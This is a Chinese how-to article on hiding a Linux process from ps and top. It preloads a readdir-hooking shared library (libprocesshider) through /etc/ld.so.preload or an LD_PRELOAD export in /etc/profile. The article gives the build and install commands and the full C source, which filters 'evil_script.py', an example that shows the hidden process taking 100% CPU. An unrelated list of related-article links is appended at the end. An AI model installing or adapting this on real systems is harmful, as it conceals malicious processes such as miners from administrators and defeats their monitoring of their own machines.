前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下载

2.思路就是利用 LD_PRELOAD 来实现系统函数的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

实现

1.下载程序编译bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.gitCloning into "libprocesshider"...remote: Counting objects: 26, done.remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26Unpacking objects: 100% (26/26), done.bmfxgkpt-yhd:~# cd libprocesshider/bmfxgkpt-yhd:~/libprocesshider# makegcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldlbmfxgkpt-yhd:~/libprocesshider#

2.移动文件到/usr/local/lib/目录下

mv libprocesshider.so /usr/local/lib/

3.把它加载到全局动态连接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

测试

1.我们运行evil_script.py

2.此时发现在top 与 ps 中都无法找到 evil_script.py

此时我们发现 cpu 100%,但是却找不到任何占用cpu高的程序

分析#define _GNU_SOURCE#include #include #include #include #include /* * Every process with this name will be excluded */static const char* process_to_filter = "evil_script.py";/* * Get a directory name given a DIR* handle */static int get_dir_name(DIR* dirp, char* buf, size_t size){ int fd = dirfd(dirp); if(fd == -1) { return 0; } char tmp[64]; snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd); ssize_t ret = readlink(tmp, buf, size); if(ret == -1) { return 0; } buf[ret] = 0; return 1;}/* * Get a process name given its pid */static int get_process_name(char* pid, char* buf){ if(strspn(pid, "0123456789") != strlen(pid)) { return 0; } char tmp[256]; snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid); FILE* f = fopen(tmp, "r"); if(f == NULL) { return 0; } if(fgets(tmp, sizeof(tmp), f) == NULL) { fclose(f); return 0; } fclose(f); int unused; sscanf(tmp, "%d (%[^)]s", &unused, buf); return 1;}#define DECLARE_READDIR(dirent, readdir) static struct dirent* (*original_##readdir)(DIR*) = NULL; struct dirent* readdir(DIR *dirp) { if(original_##readdir == NULL) { original_##readdir = dlsym(RTLD_NEXT, "readdir"); if(original_##readdir == NULL) { fprintf(stderr, "Error in dlsym: %s", dlerror()); } } struct dirent* dir; while(1) { dir = original_##readdir(dirp); if(dir) { char dir_name[256]; char process_name[256]; if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && strcmp(dir_name, "/proc") == 0 && get_process_name(dir->d_name, process_name) && strcmp(process_name, process_to_filter) == 0) { continue; } } break; } return dir; }DECLARE_READDIR(dirent64, readdir64);DECLARE_READDIR(dirent, readdir);

1.程序定义了一个变量 process_to_filter 来控制不显示哪个进程名

2.重写readdir,

strcmp(process_name, process_to_filter) == 0)

当发现当前进程名称与 process_to_filter 相同时,继续循环.

遇到的坑

1.某些Linux中这个程序编译通不过

解决方法

删除最后两行中的一行DECLARE_READDIR(dirent64, readdir64);DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload并不会生效 此时我们需要配置环境变量shell bmfxgkpt-yhd:~# vi /etc/profile增加一行shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

总结

以上所述是小编给大家介绍的linux 下隐藏进程的一种方法及遇到的坑,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对网页设计网站的支持!

linux系统调用劫持隐藏进程,linux 下隐藏进程的一种方法及遇到的坑相关推荐

  1. 网页端对接linux发起cc,(cc)实现Linux系统调用劫持

    关于系统调用劫持 如果一个木马要隐藏起来,不被系统管理员发现.截获系统调用似乎是必须的.大部分情况下,通过修改系统调用表来实现系统调用的劫持.下面是一个典型的截获系统调用的模块: 模块一: #incl ...

  2. linux删除test文件夹,Linux删除目录下的文件的几种方法

    Linux删除目录下的文件的几种方法 删除当前目录下的文件 1.rm -f * #最经典的方法,删除当前目录下的所有类型的文件 2.find . -type f -delete或find . -typ ...

  3. linux删除目录或文件命令行,Linux删除目录下的文件的10种方法小结

    看到了一遍文章,便突发奇想的想起Linux中删除目录下的所有文件的方法:整理了几个,如有不足,还望读者不吝赐教! 删除当前目录下的文件 1.rm -f * #最经典的方法,删除当前目录下的所有类型的文 ...

  4. linux存储安装教程,在Linux下安装Pngquant的三种方法:从存储库,源代码及使用Cargo安装...

    本文介绍在Linux操作系统下安装Pngquant的三种方法,即从存储库.从源代码及使用Cargo安装,可用在Arch Linux.Debian.Ubuntu.Linux Mint.Fedora.op ...

  5. linux 清空catalina.out日志 不需要重启tomcat(五种方法)【转】

    1.重定向方法清空文件 [root@localhost logs]# du -h catalina.out  查看文件大小 17M catalina.out [root@localhost logs] ...

  6. 在装完Linux系统之后自己去修改Swap分区的大小(两种方法)

    在装完Linux系统之后自己去修改Swap分区的大小(两种方法)<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:o ...

  7. 让进程在后台可靠运行的几种方法

    Linux 技巧:让进程在后台可靠运行的几种方法 想让进程在断开连接后依然保持运行?如果该进程已经开始运行了该如何补救? 如果有大量这类需求如何简化操作? 我们经常会碰到这样的问题,用 telnet/ ...

  8. 让进程在后台可靠运行的几种方法 nohup,setsid,,disown,CTRL-z ,screen

    让进程在后台可靠运行的几种方法 几年前在developerWorks上面看到的文章,感觉非常实用,又简单整理了一下,转到这里,希望给看到的人带来一些帮助.文中提到的nohup和subshell方式一直 ...

  9. Java selenium操作下拉滚动条的几种方法

    数据采集中,经常遇到动态加载的数据,我们经常使用selenium模拟浏览器操作,需要多次下拉刷新页面才能采集到所有的数据,就此总结了几种selenium操作下拉滚动条的几种方法 我这里演示的是Java ...

最新文章

  1. docker klee tutorial_通过Docker使用KLEE
  2. Qt配置GUI程序控制台输出
  3. git处理换行符问题,webstorm设置默认换行符
  4. iOS之仿QQ好友列表展开收缩效果的实现
  5. G7在实时计算的探索与实践
  6. 区块链毕业设计中期检查表模板
  7. 【软件工程】结构图(SC)——期末复习用
  8. 百度地图标记点加点击事件和鼠标移入事件并添加数据
  9. Window安装Netbeans9
  10. 代理模式——保护代理(三)
  11. 8款能让打工人效率原地飞起的神仙软件,含泪公开
  12. 新房贷政策难执行真实原因:央行货币政策非万能
  13. 强生单剂新冠疫苗对“德尔塔”有效;赛诺菲巴斯德将每年投资4亿欧元建mRNA疫苗中心 | 美通社头条...
  14. 单片机“左移右移理论”,详解
  15. 用实战项目经验告诉你什么是二方包!
  16. 女生读计算机还是经济学,女生最吃香的十大专业你知道是什么吗?女生一定要懂...
  17. 如何用记事本编写Java程序
  18. linux centos设置定时重启,Linux CentOS使用crontab设置定时重启的方法
  19. 安装WebStorm-2022.3.2
  20. 服务器智能网卡硬件测试,网卡测评:万兆网卡PK Qlogic与Intel双雄争霸 谁能胜出...

热门文章

  1. Dijkstra+DFS模板总结
  2. tensorflow : 队列管理 FIFOQueue amp;amp; RandomShuffleQueue
  3. jQuery实现手风琴效果
  4. ThinkPHP---案例1登录登出和添加部门
  5. 关于C# .net JavaScript跨域
  6. Java8新特性(二)——强大的Stream API
  7. 万以内的字符串整数变成汉子字符串
  8. 解读思维导图(一)误区
  9. MongoDB运行状态、性能监控,分析
  10. 这顶海贼王的帽子,我Python给你带上了 | 【人脸识别应用】